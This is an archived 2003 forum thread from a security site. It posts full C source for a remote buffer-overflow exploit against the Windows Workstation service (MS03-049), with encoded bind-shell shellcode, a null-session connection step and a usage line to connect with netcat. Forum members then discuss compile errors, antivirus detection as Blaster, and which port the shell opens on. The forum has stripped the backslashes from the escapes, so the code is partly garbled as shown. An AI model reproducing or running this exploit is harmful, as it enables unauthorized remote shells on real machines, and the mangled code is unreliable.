Windows Workstation Ms03-049 Remote Exploit For W2

Full Version: Windows Workstation Ms03-049 Remote Exploit For W2

GovernmentSecurity.org > The Archives > Public Downloads

Anarchy

Nov 15 2003, 02:51 AM

#include <windows.h>
#include <lm.h>
#include <stdio.h>
#include <string.h>
//#include <winsock.h>

typedef int (*MYPROC)(LPCWSTR, LPCWSTR, LPCWSTR, LPCWSTR, ULONG);

#define SIZE 2048

#pragma comment(lib,"mpr.lib")
//#pragma comment(lib,"netapi32.lib")
#pragma comment(lib,"Ws2_32.lib")
//#pragma comment(lib,"user32.lib")

unsigned char shellcode[] =
/* bindshell no RPC crash, defineable spawn port */
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90xebx19x5ex31xc9x81xe9x89xff"
"xffxffx81x36x80xbfx32x94x81xeexfcxffxffxffxe2xf2"
"xebx05xe8xe2xffxffxffx03x53x06x1fx74x57x75x95x80"
"xbfxbbx92x7fx89x5ax1axcexb1xdex7cxe1xbex32x94x09"
"xf9x3ax6bxb6xd7x9fx4dx85x71xdaxc6x81xbfx32x1dxc6"
"xb3x5axf8xecxbfx32xfcxb3x8dx1cxf0xe8xc8x41xa6xdf"
"xebxcdxc2x88x36x74x90x7fx89x5axe6x7ex0cx24x7cxad"
"xbex32x94x09xf9x22x6bxb6xd7xddx5ax60xdfxdax8ax81"
"xbfx32x1dxc6xabxcdxe2x84xd7xf9x79x7cx84xdax9ax81"
"xbfx32x1dxc6xa7xcdxe2x84xd7xebx9dx75x12xdax6ax80"
"xbfx32x1dxc6xa3xcdxe2x84xd7x96x8exf0x78xdax7ax80"
"xbfx32x1dxc6x9fxcdxe2x84xd7x96x39xaex56xdax4ax80"
"xbfx32x1dxc6x9bxcdxe2x84xd7xd7xddx06xf6xdax5ax80"
"xbfx32x1dxc6x97xcdxe2x84xd7xd5xedx46xc6xdax2ax80"
"xbfx32x1dxc6x93x01x6bx01x53xa2x95x80xbfx66xfcx81"
"xbex32x94x7fxe9x2axc4xd0xefx62xd4xd0xffx62x6bxd6"
"xa3xb9x4cxd7xe8x5ax96x80xaex6ex1fx4cxd5x24xc5xd3"
"x40x64xb4xd7xecxcdxc2xa4xe8x63xc7x7fxe9x1ax1fx50"
"xd7x57xecxe5xbfx5axf7xedxdbx1cx1dxe6x8fxb1x78xd4"
"x32x0exb0xb3x7fx01x5dx03x7ex27x3fx62x42xf4xd0xa4"
"xafx76x6axc4x9bx0fx1dxd4x9bx7ax1dxd4x9bx7ex1dxd4"
"x9bx62x19xc4x9bx22xc0xd0xeex63xc5xeaxbex63xc5x7f"
"xc9x02xc5x7fxe9x22x1fx4cxd5xcdx6bxb1x40x64x98x0b"
"x77x65x6bxd6x93xcdxc2x94xeax64xf0x21x8fx32x94x80"
"x3axf2xecx8cx34x72x98x0bxcfx2ex39x0bxd7x3ax7fx89"
"x34x72xa0x0bx17x8ax94x80xbfxb9x51xdexe2xf0x90x80"
"xecx67xc2xd7x34x5exb0x98x34x77xa8x0bxebx37xecx83"
"x6axb9xdex98x34x68xb4x83x62xd1xa6xc9x34x06x1fx83"
"x4ax01x6bx7cx8cxf2x38xbax7bx46x93x41x70x3fx97x78"
"x54xc0xafxfcx9bx26xe1x61x34x68xb0x83x62x54x1fx8c"
"xf4xb9xcex9cxbcxefx1fx84x34x31x51x6bxbdx01x54x0b"
"x6ax6dxcaxddxe4xf0x90x80x2fxa2x04";

int main(int argc,char ** argv)
{
int ret=0;
HINSTANCE hInstance;
MYPROC procAddress;
char szBuffer[SIZE];
NETRESOURCE netResource;
int i=0;

unsigned short lportl=1234; /* drg */
char lport[5] = "x00xFFxFFx8b"; /* drg */

char host[30];
LPSTR hostipc[40];
LPWSTR hostl[60];
if(argc<2) {
printf("Windows Workstation ms03-049 wkksvc.dll buffer overflow
nbug discoveried by eEye,code by Hanabishi,shellcode by oc.192 n
Modified by sbaa(sbaa@163.net) 2003/11/14 ver 0.1n
Usage: %s IP n
nc Ip 1234n",argv[0]);
printf("");
return 0;
}
sprintf(host,"\\%s",argv[1]);
sprintf((char *)hostipc,"%s\ipc$",host);

netResource.lpLocalName = NULL;
netResource.lpProvider = NULL;
netResource.dwType = RESOURCETYPE_ANY;
netResource.lpRemoteName=(char *)hostipc;
// "\\192.168.6.7\ipc$";

ret = WNetAddConnection2(&netResource, "", "", 0); // attempt a null session
if (ret != 0)
{
fprintf(stderr, "[-] WNetAddConnection2 failedn");
// return 1;
}

hInstance = LoadLibrary("netapi32");
if (hInstance == NULL)
{
fprintf(stderr, "[-] LoadLibrary failedn");
return 1;
}

procAddress = (MYPROC)GetProcAddress(hInstance, "NetAddAlternateComputerName"); // up to you to check NetAddAlternateComputerName
if (procAddress == NULL)
{
fprintf(stderr, "can't find NetAddAlternateComputerName (you are not xp(2003)) n");
// return 1;
procAddress = (MYPROC)GetProcAddress(hInstance, "NetValidateName"); // up to you to check NetAddAlternateComputerName
if (procAddress == NULL)
{
fprintf(stderr, "can't find NetValidateName!n");
return 1;
}
}

memset(szBuffer, 0x90, sizeof(szBuffer));
/*
for( i=0;i<SIZE-4;i=i+4)
{

if((i+i/256)%256!=0) memset(szBuffer+i,i+i/256,1);
if((i+1)%256!=0) memset(szBuffer+i+1,i+1,1);
if((i+2)%256!=0) memset(szBuffer+i+2,i+2,1);
if((i+3)%256!=0) memset(szBuffer+i+3,i+3,1);
}
*/
lportl=htons(lportl);
memcpy(&lport[1], &lportl, 2);
*(long*)lport = *(long*)lport ^ 0x9432BF80;
memcpy(&shellcode[471-48],&lport,4);
memcpy(szBuffer, shellcode, sizeof(shellcode) - 1);

memcpy(szBuffer+1851,"x1bx4axfax7f",4);
memcpy(szBuffer+2017,"x1bx4axfax7f",4);

szBuffer[SIZE-1]=0;

MultiByteToWideChar(CP_ACP, NULL, host, -1, (unsigned short*)hostl,60);

try{
ret = (procAddress)((LPCWSTR)hostl, (LPCWSTR)szBuffer, NULL, NULL, 0);

}

catch(...)
{

}

//ret=NetValidateName(hostl, szBuffer, NULL, NULL, 0);

printf("%dn",ret);
WNetCancelConnection2(netResource.lpRemoteName, 0, TRUE);
FreeLibrary(hInstance);
return 0;
}

kevin007

Nov 15 2003, 03:22 AM

I see blaster in the .exe

will try compiling the source code, possible norton is just being too cautious - it doesnt look bad, prob just too similar to blaster in some ways

Edit:

Code compiling almost worked, a problem with the lport (and some with the text printout/hex, but they were simple to fix - the missing {code} brackets removed the \'s from the sploit ):

CODE

"main.cpp": E2034 Cannot convert 'unsigned short *' to 'wchar_t *' in function main(int,char * *) at line 148
"main.cpp": E2342 Type mismatch in parameter 'lpWideCharStr' (wanted 'wchar_t *', got 'unsigned short *') in function main(int,char * *) at line 148

This line has more of a problem, totally oblivious for that:

CODE

MultiByteToWideChar(CP_ACP, NULL, host, -1, (unsigned short*)hostl,60);

Didn't work on my 2k machine (what a surprise...), am gonna find a fresh xp to test it on

Anarchy

Nov 15 2003, 03:39 AM

worm blaster?

ok,i compiled so many exploits
u dont believe me
ud better compile it by urself

http://www.security-corporation.com/downlo.../ms03-049-w2k.c

shorto85

Nov 15 2003, 07:51 AM

Norton picked it up as blaster... can anyone verify this?

Littlelord

Nov 15 2003, 11:35 AM

@Shorto85,
yes I can confirm this. But I assume that this is because the exploit is similar to the blaster and may be detected because of idetical code parts

LL

enlightnr

Nov 15 2003, 01:06 PM

LMAO if you think that its virus ridden you shouldnt be compiling dangerous things like this. Its best that you stay away for you own good before you get infected by Blaster!

Toilal

Nov 15 2003, 02:23 PM

This shellocode opens a shell on the 4444 port. not 1234.
and don't we need to use \x90\x90\x90 in the shellcode, and not x90x90x90 ?

T3cHn0b0y

Nov 15 2003, 02:28 PM

Doesnt work. Doesnt even attempt to make a connection to the remote ip.

Toilal

Nov 15 2003, 02:42 PM

U need to paste the source in CODE tag on the forum, because it strip some characters, including this

CODE

Jurojin

Nov 15 2003, 03:44 PM

QUOTE (T3cHn0b0y @ Nov 15 2003, 02:28 PM)

Doesnt work. Doesnt even attempt to make a connection to the remote ip.

Yes it does cuz I just tried it with my firewall enabled and there is an outgoing connection to the target host on port 445.

QuadMedic

Nov 16 2003, 12:08 PM

it should spawn shell on 1234 and not 4444..do u scan for port 445 or 135?

ComSec

Nov 17 2003, 11:05 PM

right i have removed the attachement....

can someone explain to me

was it a malicious intended file...or a genuine compiled mistake ?

is the compiled version the same as the code posted by Anarchy ?

and the same as on security-corp.... i aint got time to check it out ...am busy atm

thanks

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.